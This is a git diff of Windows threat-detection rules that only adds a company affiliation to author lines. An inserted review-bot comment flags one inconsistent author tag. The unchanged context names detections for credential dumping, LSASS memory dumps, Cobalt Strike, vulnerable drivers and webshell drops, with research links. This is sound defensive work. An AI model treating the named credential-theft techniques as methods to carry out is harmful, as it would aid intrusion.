--- a/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml
+++ b/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes
 references:
     - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte
-author: pH-T
+author: pH-T (Nextron Systems)
 date: 2022/07/15
 modified: 2023/01/16
 tags:
diff --git a/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml b/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml
index eb3e5fc11..d9acf4aea 100644
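Review bot: The new author line for rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml tags only the first author, leaving Florian Roth without the affiliation that every other hunk in this commit adds to his name (for example the cobaltstrike_process_injection and mal_creddumper hunks, where he is tagged even mid-list). Unless that omission is intentional, the line should read `+author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)`. A downstream consumer that attributes rules by author string will otherwise see two distinct identities for the same person.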
--- a/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml
+++ b/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml
@@ -8,7 +8,7 @@ description: Detects a program that invoked suspicious DNS queries known from Co
 references:
     - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns
     - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/11/09
 modified: 2023/01/16
 tags:
diff --git a/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml b/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml
index b445a9c6a..5237cd85a 100644
--- a/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml
+++ b/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)
 references:
     - https://www.teamviewer.com/en-us/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/30
 modified: 2022/02/08
 tags:
diff --git a/rules/windows/driver_load/driver_load_win_mal_creddumper.yml b/rules/windows/driver_load/driver_load_win_mal_creddumper.yml
index d6792b13b..593bfeae4 100644
--- a/rules/windows/driver_load/driver_load_win_mal_creddumper.yml
+++ b/rules/windows/driver_load/driver_load_win_mal_creddumper.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects well-known credential dumping tools execution via service execution events
 references:
     - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
+author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
 date: 2017/03/05
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/driver_load/driver_load_win_mal_poortry_driver.yml b/rules/windows/driver_load/driver_load_win_mal_poortry_driver.yml
index 60ffcf498..db3b014f9 100644
--- a/rules/windows/driver_load/driver_load_win_mal_poortry_driver.yml
+++ b/rules/windows/driver_load/driver_load_win_mal_poortry_driver.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.
 references:
     - https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/16
 modified: 2022/12/30
 tags:
diff --git a/rules/windows/driver_load/driver_load_win_process_hacker.yml b/rules/windows/driver_load/driver_load_win_process_hacker.yml
index b6f1bd10a..bb8a2f190 100644
--- a/rules/windows/driver_load/driver_load_win_process_hacker.yml
+++ b/rules/windows/driver_load/driver_load_win_process_hacker.yml
@@ -6,7 +6,7 @@ references:
     - https://processhacker.sourceforge.io/
     - https://systeminformer.sourceforge.io/
     - https://github.com/winsiderss/systeminformer
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/11/16
 modified: 2022/12/30
 tags:
diff --git a/rules/windows/driver_load/driver_load_win_susp_temp_use.yml b/rules/windows/driver_load/driver_load_win_susp_temp_use.yml
index 50c864855..57e609ae7 100644
--- a/rules/windows/driver_load/driver_load_win_susp_temp_use.yml
+++ b/rules/windows/driver_load/driver_load_win_susp_temp_use.yml
@@ -2,7 +2,7 @@ title: Suspicious Driver Load from Temp
 id: 2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75
 status: test
 description: Detects a driver load from a temporary directory
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/02/12
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/driver_load/driver_load_win_vuln_avast_anti_rootkit_driver.yml b/rules/windows/driver_load/driver_load_win_vuln_avast_anti_rootkit_driver.yml
index 0bc040cb0..c52625a1f 100644
--- a/rules/windows/driver_load/driver_load_win_vuln_avast_anti_rootkit_driver.yml
+++ b/rules/windows/driver_load/driver_load_win_vuln_avast_anti_rootkit_driver.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products
 references:
     - https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/28
 modified: 2022/12/30
 tags:
diff --git a/rules/windows/driver_load/driver_load_win_vuln_dell_driver.yml b/rules/windows/driver_load/driver_load_win_vuln_dell_driver.yml
index f776c8f90..936bc705d 100644
--- a/rules/windows/driver_load/driver_load_win_vuln_dell_driver.yml
+++ b/rules/windows/driver_load/driver_load_win_vuln_dell_driver.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551
 references:
     - https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/05/05
 modified: 2022/12/30
 tags:
diff --git a/rules/windows/driver_load/driver_load_win_vuln_drivers.yml b/rules/windows/driver_load/driver_load_win_vuln_drivers.yml
index b18a9b80a..4389e211d 100644
--- a/rules/windows/driver_load/driver_load_win_vuln_drivers.yml
+++ b/rules/windows/driver_load/driver_load_win_vuln_drivers.yml
@@ -19,7 +19,7 @@ references:
     - https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/
     - https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444
     - https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/18
 modified: 2023/01/11
 tags:
diff --git a/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml b/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml
index 9190cabce..ebfeeedd7 100644
--- a/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml
+++ b/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml
@@ -18,7 +18,7 @@ references:
     - https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/
     - https://eclypsium.com/2019/11/12/mother-of-all-drivers/
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/03
 modified: 2023/01/11
 tags:
diff --git a/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml b/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml
index 23430aa01..b16591f85 100644
--- a/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml
+++ b/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml
@@ -8,7 +8,7 @@ references:
     - https://github.com/fengjixuchui/gdrv-loader
     - https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details
     - https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/07/25
 modified: 2022/12/30
 tags:
diff --git a/rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml b/rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml
index 2b3b1ecee..cbedf223d 100644
--- a/rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml
+++ b/rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors
 references:
     - https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/18
 modified: 2022/11/19
 tags:
diff --git a/rules/windows/driver_load/driver_load_win_vuln_hw_driver.yml b/rules/windows/driver_load/driver_load_win_vuln_hw_driver.yml
index a3cd49955..bd53bf26a 100644
--- a/rules/windows/driver_load/driver_load_win_vuln_hw_driver.yml
+++ b/rules/windows/driver_load/driver_load_win_vuln_hw_driver.yml
@@ -5,7 +5,7 @@ description: Detects the load of a legitimate signed driver named HW.sys by ofte
 references:
     - https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/
     - https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/07/26
 modified: 2022/12/30
 tags:
diff --git a/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml b/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml
index 92d286c44..e46ea3847 100644
--- a/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml
+++ b/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml
@@ -5,7 +5,7 @@ description: Detects the load of the vulnerable Lenovo driver as reported in CVE
 references:
     - https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities
     - https://github.com/alfarom256/CVE-2022-3699/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/11/10
 modified: 2022/12/30
 tags:
diff --git a/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml b/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml
index 57fe1d4dc..3e63dc070 100644
--- a/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml
+++ b/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml
@@ -5,7 +5,7 @@ description: Detects the load of a signed WinRing0 driver often used by threat a
 references:
     - https://github.com/xmrig/xmrig/tree/master/bin/WinRing0
     - https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/07/26
 modified: 2022/11/19
 tags:
diff --git a/rules/windows/driver_load/driver_load_win_windivert.yml b/rules/windows/driver_load/driver_load_win_windivert.yml
index 3910b8002..4c23f5677 100644
--- a/rules/windows/driver_load/driver_load_win_windivert.yml
+++ b/rules/windows/driver_load/driver_load_win_windivert.yml
@@ -5,7 +5,7 @@ description: Detects the load of the Windiver driver, a powerful user-mode captu
 references:
     - https://reqrypt.org/windivert-doc.html
     - https://rastamouse.me/ntlm-relaying-via-cobalt-strike/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/07/30
 modified: 2022/11/19
 tags:
diff --git a/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml b/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml
index c6f7445de..4ef585297 100644
--- a/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml
+++ b/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml
@@ -7,7 +7,7 @@ description: |
 references:
     - https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz
     - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/11
 tags:
     - attack.t1003
diff --git a/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml b/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml
index 2fd3ea828..3b7a8d376 100644
--- a/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml
+++ b/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml
@@ -7,7 +7,7 @@ description: |
 references:
     - https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/
     - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/17
 tags:
     - attack.credential_access
diff --git a/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml b/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml
index fb7d89475..80374f728 100644
--- a/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml
+++ b/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml
@@ -7,7 +7,7 @@ description: |
 references:
     - https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist
     - https://www.passcape.com/windows_password_recovery_dpapi_credhist
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/17
 tags:
     - attack.credential_access
diff --git a/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml b/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml
index 9342cfd8d..247ab5363 100644
--- a/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml
+++ b/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
 references:
     - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/26
 modified: 2022/12/30
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml b/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml
index 810c6cc6e..e810a424b 100644
--- a/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml
+++ b/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml
@@ -7,7 +7,7 @@ description: |
     which is a legitimate DLL that's part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)
 references:
     - https://redcanary.com/blog/misbehaving-rats/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/28
 tags:
     - attack.command_and_control
diff --git a/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml b/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml
index ea83cc117..5442b3a5c 100644
--- a/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml
+++ b/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious file creation patterns found in logs when CrackMapExec is used
 references:
     - https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/12
 modified: 2022/05/27
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml b/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml
index 23c65c682..187b8afab 100644
--- a/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml
+++ b/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml
@@ -11,7 +11,7 @@ references:
     - https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/
     - https://github.com/Wh04m1001/SysmonEoP
     - https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/01
 modified: 2022/12/09
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml b/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml
index 30015e28b..9a1479ec1 100644
--- a/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml
+++ b/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml
@@ -6,7 +6,7 @@ references:
     - https://github.com/hhlxf/PrintNightmare
     - https://github.com/afwu/PrintNightmare
     - https://github.com/cube0x0/CVE-2021-1675
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/06/29
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml b/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml
index e205412d6..c3ad5dcfc 100644
--- a/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml
+++ b/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml
@@ -5,7 +5,7 @@ description: Detects signs of the exploitation of LPE CVE-2021-41379 that includ
 references:
     - https://github.com/klinix5/InstallerFileTakeOver
     - https://www.zerodayinitiative.com/advisories/ZDI-21-1308/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/11/22
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml b/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml
index 238d5900d..62cc66152 100644
--- a/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml
+++ b/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml
@@ -5,7 +5,7 @@ description: Detects the creation of "msiexec.exe" in the "bin" directory of the
 references:
     - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/
     - https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/06
 tags:
     - attack.execution
diff --git a/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml b/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml
index ae0f17b84..e846559e3 100644
--- a/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml
+++ b/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache
 references:
     - https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/04/13
 tags:
     - attack.privilege_escalation
diff --git a/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml b/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml
index e420bb832..0b9d41acd 100644
--- a/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml
+++ b/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml
@@ -7,7 +7,7 @@ description: |
 references:
     - https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/
     - https://github.com/last-byte/PersistenceSniper
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/09
 modified: 2022/12/19
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml b/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml
index 59e2d8a5f..b29ab3b72 100644
--- a/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml
+++ b/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml
@@ -9,7 +9,7 @@ references:
     - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/
     - https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html
     - https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html
-author: Florian Roth (rule), MSTI (query, idea)
+author: Florian Roth (Nextron Systems), MSTI (query, idea)
 date: 2022/10/01
 tags:
     - attack.persistence
diff --git a/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml b/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml
index 1c3900cfc..305edacbd 100644
--- a/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml
+++ b/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml
@@ -9,7 +9,7 @@ references:
     - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/
     - https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html
     - https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/10/04
 tags:
     - attack.persistence
diff --git a/rules/windows/file/file_event/file_event_win_hack_dumpert.yml b/rules/windows/file/file_event/file_event_win_hack_dumpert.yml
index 3a4290d13..2551f4319 100755
--- a/rules/windows/file/file_event/file_event_win_hack_dumpert.yml
+++ b/rules/windows/file/file_event/file_event_win_hack_dumpert.yml
@@ -8,7 +8,7 @@ description: Detects the use of Dumpert process dumper, which dumps the lsass.ex
 references:
     - https://github.com/outflanknl/Dumpert
     - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/02/04
 modified: 2022/12/02
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml b/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml
index e5532258a..becfff800 100644
--- a/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml
+++ b/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml
@@ -7,7 +7,7 @@ references:
     - https://github.com/FireFart/hivenightmare/
     - https://github.com/WiredPulse/Invoke-HiveNightmare
     - https://twitter.com/cube0x0/status/1418920190759378944
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/07/23
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml b/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml
index 9bd4ed6aa..39e532a2f 100644
--- a/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml
+++ b/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml
@@ -5,7 +5,7 @@ description: Detects the use of NPPSpy hacktool that stores cleartext passwords
 references:
     - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy
     - https://twitter.com/0gtweet/status/1465282548494487554
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/11/29
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml b/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml
index 7f09963f8..c9d5877ff 100644
--- a/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml
+++ b/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml
@@ -2,7 +2,7 @@ title: Inveigh Execution Artefacts
 id: bb09dd3e-2b78-4819-8e35-a7c1b874e449
 status: experimental
 description: Detects the presence and execution of Inveigh via dropped artefacts
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 references:
     - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs
     - https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs
diff --git a/rules/windows/file/file_event/file_event_win_iso_file_recent.yml b/rules/windows/file/file_event/file_event_win_iso_file_recent.yml
index 373270ab6..a6c96523f 100644
--- a/rules/windows/file/file_event/file_event_win_iso_file_recent.yml
+++ b/rules/windows/file/file_event/file_event_win_iso_file_recent.yml
@@ -9,7 +9,7 @@ references:
 - https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore
 - https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/
 - https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/11
 logsource:
 product: windows
diff --git a/rules/windows/file/file_event/file_event_win_lsass_dump.yml b/rules/windows/file/file_event/file_event_win_lsass_dump.yml
index 7184c6c4d..5ea1eb271 100644
--- a/rules/windows/file/file_event/file_event_win_lsass_dump.yml
+++ b/rules/windows/file/file_event/file_event_win_lsass_dump.yml
@@ -11,7 +11,7 @@ references:
 - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml
 - https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/
 - https://github.com/helpsystems/nanodump
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/11/15
 modified: 2022/06/27
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml b/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml
index e0ead914e..c95398dea 100644
--- a/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml
+++ b/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
 references:
 - https://github.com/helpsystems/nanodump
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/27
 tags:
 - attack.credential_access
diff --git a/rules/windows/file/file_event/file_event_win_mal_adwind.yml b/rules/windows/file/file_event/file_event_win_mal_adwind.yml
index 1b454703c..bc0e4c945 100644
--- a/rules/windows/file/file_event/file_event_win_mal_adwind.yml
+++ b/rules/windows/file/file_event/file_event_win_mal_adwind.yml
@@ -8,7 +8,7 @@ description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
 references:
 - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100
 - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
-author: Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
+author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
 date: 2017/11/10
 modified: 2022/12/02
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml b/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml
index 3e5ceac63..c7a59b159 100644
--- a/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml
+++ b/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the creation of files that contain Kerberos tickets based on an extension used by the popular tool Mimikatz
 references:
 - https://cobalt.io/blog/kerberoast-attack-techniques
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/11/08
 tags:
 - attack.credential_access
diff --git a/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml b/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml
index 00df15a95..0bcabe0d8 100644
--- a/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml
+++ b/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs
 references:
 - Internal Research
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/05
 modified: 2022/10/28
 tags:
diff --git a/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml b/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml
index 47888c46d..6c8d3124a 100644
--- a/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml
+++ b/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml
